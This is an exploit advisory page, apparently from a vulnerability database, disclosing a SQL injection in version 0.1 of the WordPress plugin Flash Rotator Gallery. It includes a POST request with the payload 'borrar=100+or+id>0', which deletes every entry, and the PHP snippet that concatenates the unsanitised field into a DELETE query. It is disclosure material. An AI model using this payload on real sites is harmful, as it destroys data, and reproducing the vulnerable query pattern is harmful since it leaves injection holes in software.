WordPress plugin Flash Rotator Gallery SQL injection

2017.03.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: WordPress plugin Flash Rotator Gallery - SQL injection # Date: 2017-03-12 # Exploit Author: malwrforensics # Vendor Homepage: http://www.webpsilon.com/wordpress-plugins/flash-rotator-gallery/ # Software Link: https://downloads.wordpress.org/plugin/flash-rotator-gallery.zip # Version: 0.1 # Tested on: Linux HTTP request data: POST http://192.168.205.102/wordpress/wp-admin/admin.php?page=flash_rotator_gallery.php HTTP/1.1 <snip> borrar=100+or+id>0 #delete all entries Technical details: Affected file: flash-rotator-gallery.php <snip> if(isset($_POST['borrar'])) { $sql = "DELETE FROM $table_name WHERE id = ".$_POST['borrar'].";"; #$_POST['borrar'] is not sanitized $wpdb->query($sql); <snip> Thanks.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top